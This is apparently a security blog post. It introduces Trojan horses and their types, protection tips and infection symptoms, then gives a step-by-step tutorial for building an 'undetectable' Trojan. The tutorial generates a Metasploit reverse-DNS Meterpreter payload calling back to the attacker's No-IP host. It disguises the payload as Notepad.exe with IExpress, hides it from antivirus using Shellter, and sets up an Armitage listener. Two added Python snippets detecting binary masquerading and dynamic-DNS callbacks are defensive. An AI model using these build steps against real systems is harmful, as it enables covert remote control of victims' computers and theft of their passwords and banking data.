Introduction to Trojan Horse




I am pretty sure you’ve come across the movie "Troy", where Brad Pitt played Achilles. As in the movie, a Trojan horse is much like the wooden horse that was used to trick the soldiers of Troy into bringing enemy warriors into their city.


A Trojan tends to look like a safe bet but isn’t. A Trojan horse hides malware in what appears to be a normal activity. Once inside, it attaches itself to the host system and begins to pull the plugs on your computer without your knowledge or consent.


By default, a Trojan behaves like a daemon: it runs quietly in the background, and you won’t know it is present on your computer system. At least not unless you’re a pentesting pro :-). A Trojan horse can take several forms:


1) It sometimes looks like a malicious instruction that is hidden inside a legitimate program and carries out actions that are unauthorized and unwanted by the user.

2) A legitimate piece of software is altered by attaching a Trojan to it. The combined file is executed with the help of a stub, with the legitimate program read in as bytes. Once done, the user will see the program functioning normally and will never suspect that a Trojan also entered their system without their consent.


Trojans, in general, are spread by some form of social engineering. A quick example is clicking on a fake advert online, or a scenario where a user is tricked into opening an email attachment disguised to look harmless.


Trojans may in effect give an attacker access to the user’s information, such as passwords, personal identity and banking information.

Some of the most common Trojans




  • Downloader Trojan: The main focus of this kind of Trojan is to download additional malware onto the already infected computer.

  • Backdoor Trojan: This Trojan allows the attacker access to the computer by creating a “backdoor”.

  • Infostealer Trojan: This kind of Trojan is specifically made to steal data from the infected computer.

  • Remote access Trojan: A Trojan that gives the attacker full control over the computer system.

  • DDoS attack Trojan: Designed to carry out DDoS attacks which flood a network with traffic, thereby taking it down.


How to keep strong and not get wrecked by a Horse


I’ve been telling you lots of stuff about Trojan horses, which might have aroused your interest or gotten you a bit worried. Get excited bruh, because Trojans aren’t bulletproof. Let’s take a look at some protection techniques:




  • Always be on the lookout for new updates for your operating system and software. It is advisable to install an update as soon as the software company releases it, because attackers tend to exploit security vulnerabilities in outdated software.

  • Run periodic scans with your security software. Computer security should begin with an internet security suite. You should set it up so that the program runs scans automatically at regular intervals.

  • Stop visiting unsafe websites. This can be done with the help of internet security suites, which alert the user if the site they are about to visit is unsafe.

  • Protect all your accounts with very strong, unique passwords.

  • Always keep your personal information safe with a firewall.


You must be wondering, "Okay, how do I know that my computer is infected?"

My answer to that is to always be on the lookout for the following:


  • Does your PC keep talking to you, displaying annoying popups and messages telling you that your PC is infected and in need of protection? This can also come in the form of an advert.

  • Applications don't start. If you've ever tried to run a program from the Start menu and nothing happens, or sometimes a different program starts, then you should worry. This could be another problem though, but it is one of the many symptoms of an infected computer.

  • The computer is running extremely slowly. This could be the result of many things, including a Trojan.

  • You find it difficult to connect to the internet, or it runs extremely slowly even though the guy next to you is browsing with ease.

  • What happened to my files? Even my antivirus!

  • I connect to the Internet, and different windows open or the browser shows pages I did not request.

  • Your computer starts speaking a funny language. If the default language of applications changes or the screen displays back-to-front, you should really check your computer, because you might just have an infected system.


Mobile Apps aren't spared from Trojan


Trojans don’t just wreck laptops and desktop machines. They can also cause havoc on a mobile device. The amount of risk taken is basically the same, except that before completing the installation of an Android app, you’ll get a giant list of all the stuff you’re giving the application access to.

The major difference between a computer and an Android phone is that it’s much easier to get updates and choose anti-virus protection on a PC, while on the phone you have to rely solely on Google to do the work.

Computer protection is constantly being improved, while mobile protection still leaves a huge gap.

You should, however, note that if a Trojan is executed in a restrictive environment, as in the case of a non-root user on a UNIX system, the Trojan will most likely not function properly (though it can still pose a great threat). But in a scenario where it is executed in a Windows environment, the Trojan will be able to carry out all its functionality, because Windows security is more vulnerable than that of Unix.



How do Hackers create an undetectable Trojan Horse?


There'll be no point to this introduction if I don't show an example of how hackers develop Trojans. There isn't a specific rule or method. Each hacker does whatever works for him, and I'm gonna share what works here. Quite basic actually.

However, you should note that in no way is Spyhood responsible for the actions you perform with this piece of knowledge. Check the disclaimer page for more info on that.

First, let's look at the list of things you'll be needing in order to perform this task;
  • Windows
  • Kali Linux
  • A No IP account with a domain name
  • Shellter
  • A forwarded port on your router

Now let's dive in 👇 to the steps




First step; create the DNS payload using Kali Linux


  • Open Metasploit on Kali Linux by typing msfconsole in a terminal.

  • Type use payload/windows/meterpreter/reverse_tcp_dns.

  • Type show options. You will be prompted to set your lhost and lport.

  • Type set lhost (hostname you created, without http://).

  • Type set lport (port you forwarded on your router set for the Linux machine).

  • Type generate -h to display all options for generating the payload.

  • Type generate -f (file title you chose for the payload) -p windows -t raw. Example; generate -f DNS -p windows -t raw

  • Exit the terminal and click on Files.

  • Transfer the created payload to Windows. (Be aware that your AV might detect it at its current state).


Second step; create the executable file on Windows


  • For 32-bit Windows - Navigate to C:\Windows\System32\iexpress.exe (Right click and select run as administrator). For 64-bit Windows - Navigate to C:\Windows\SysWOW64\iexpress.exe (select run as administrator)

  • Select Create new Self Extraction Directive File.

  • Click next on the Package Purpose page.

  • Name the package.  Ex: Notepad.exe

  • No Prompt, click next.

  • Do not display a license.

  • Click Add and select any file on your computer. Choose Notepad.exe in the C:\Windows\System32 folder.

  • Click the drop arrow and select the file name you choose on the last screen.

  • Choose Hidden and then click next.

  • No Message. Click Next

  • Click Browse to create a title for your malware file. Then choose a destination path. Check the Hide File Extracting Progress Animation from user.

  • Select No restart.

  • You can either choose to save the self-extraction or not.

  • Click Next on the create Package. Then Finish.


Third step; use both created files in shellter to create Trojan Horse



  • Open the Shellter folder. Right click on Shellter.exe and run as Administrator.

  • Type A for Auto.

  • Type N for No.

  • Type the location of the EXE file you created from the second step and hit enter. Let Shellter do its thing for a minute.

  • Type C for custom when asked to choose payload, 

  • Type the location of the payload you created in the first step and hit enter.

  • Type N for No reflective DLL loader.

  • Press enter to allow Shellter do its thing. You should have a working undetectable Trojan Horse If it says Injection Verified!

  • Press enter to exit Shellter.
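
From the defender's side, the file built in the second and third steps is a package that borrows the name of a Windows binary (Notepad.exe), which is something process-creation logs can expose. The following is an added example, not part of the original post: it flags processes that use a system binary's name from an unexpected directory or with a mismatched PE OriginalFileName. The allowlist, the event field names (modelled on Sysmon Event ID 1) and the sample events are assumptions constructed for illustration.

```python
from pathlib import PureWindowsPath

# Assumed allowlist for this example: where these Windows binaries normally live.
EXPECTED_DIRS = {
    "notepad.exe": {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"},
    "calc.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
}

# Constructed process-creation events; hosts, paths and values are made up.
SAMPLE_EVENTS = [
    {"host": "ws-01", "image": r"C:\Windows\System32\notepad.exe",
     "original_file_name": "NOTEPAD.EXE"},
    {"host": "ws-02", "image": r"C:\Users\alice\Downloads\Notepad.exe",
     "original_file_name": "WEXTRACT.EXE"},
    {"host": "ws-02",
     "image": r"C:\Users\alice\AppData\Local\Temp\IXP000.TMP\notepad.exe",
     "original_file_name": "NOTEPAD.EXE"},
    {"host": "ws-03", "image": r"C:\Program Files\Editor\editor.exe",
     "original_file_name": "editor.exe"},
]


def masquerade_findings(events):
    """Return (host, image, reasons) for processes that borrow a system binary's name."""
    findings = []
    for ev in events:
        image = PureWindowsPath(ev["image"])  # parses Windows paths on any OS
        name = image.name.lower()
        expected = EXPECTED_DIRS.get(name)
        if expected is None:
            continue  # not a name we track
        reasons = []
        if str(image.parent).lower() not in expected:
            reasons.append("system binary name outside its expected directory")
        original = ev.get("original_file_name", "").lower()
        if original and original != name:
            reasons.append("file name differs from PE OriginalFileName")
        if reasons:
            findings.append((ev["host"], ev["image"], reasons))
    return findings


if __name__ == "__main__":
    for host, image, reasons in masquerade_findings(SAMPLE_EVENTS):
        print(f"{host}: {image} -> {'; '.join(reasons)}")
```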

The final step; set your listener


I'm gonna use Armitage for this tutorial.



  • Go back to Kali Linux.

  • Open the Terminal and type Msfupdate.

  • Type apt-get install armitage.

  • Type msfdb init.

  • Open Armitage.

  • Click Connect.

  • Click Yes.

  • When Armitage opens, type: use exploit/multi/handler

  • Type set lhost 0.0.0.0

  • Type set lport (the exact port you forwarded in your router)

  • Type set payload windows/meterpreter/reverse tcp dns

  • Type set exitonsession false

  • (Optional.) Type set autorunscript migrate -f

  • (Optional.) Type set prependmigrate True

  • Type exploit -j

Optional steps are used in order to migrate the entire process automatically so the session does not end before you get the chance to do it manually.
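
The payload in this walkthrough calls back to a dynamic-DNS hostname (the No-IP account listed in the requirements), so resolver logs are one place a defender can spot an infected machine. The following is an added example, not part of the original post: it counts, per internal client, repeated lookups of hostnames under dynamic-DNS suffixes. The suffix list, the log format and the sample lines are assumptions constructed for illustration.

```python
from collections import Counter

# Assumed sample of dynamic-DNS suffixes; extend it from your own provider list.
DYNDNS_SUFFIXES = ("ddns.net", "hopto.org", "zapto.org", "sytes.net", "no-ip.org")

# Constructed resolver log: "<timestamp> <client ip> <query name> <type>".
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.23 www.example.com. A
2024-05-01T10:00:05Z 10.0.0.42 constructed-host.ddns.net. A
2024-05-01T10:05:05Z 10.0.0.42 Constructed-Host.DDNS.net. A
2024-05-01T10:10:05Z 10.0.0.42 constructed-host.ddns.net. A
2024-05-01T10:11:00Z 10.0.0.23 notddns.net. A
2024-05-01T10:12:00Z 10.0.0.57 other-host.hopto.org. A
"""


def normalize(qname):
    """Lower-case a query name and drop the trailing root dot."""
    return qname.rstrip(".").lower()


def dyn_suffix(qname):
    """Return the matching dynamic-DNS suffix for a hostname under it, else None."""
    name = normalize(qname)
    for suffix in DYNDNS_SUFFIXES:
        # Match on a label boundary so "notddns.net" is not mistaken for "ddns.net".
        if name.endswith("." + suffix):
            return suffix
    return None


def dyndns_lookups(log_text, min_count=3):
    """Map (client, hostname) to lookup count for dynamic-DNS names seen >= min_count times."""
    hits = Counter()
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue  # skip malformed lines
        client, qname = parts[1], parts[2]
        if dyn_suffix(qname):
            hits[(client, normalize(qname))] += 1
    return {key: count for key, count in hits.items() if count >= min_count}


if __name__ == "__main__":
    for (client, host), count in dyndns_lookups(SAMPLE_LOG).items():
        print(f"{client} resolved {host} {count} times")
```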



Your Trojan Horse is ready. Don't forget to check my disclaimer page to check out the part Spyhood plays in all this. Also, connect with me on Facebook if you will.




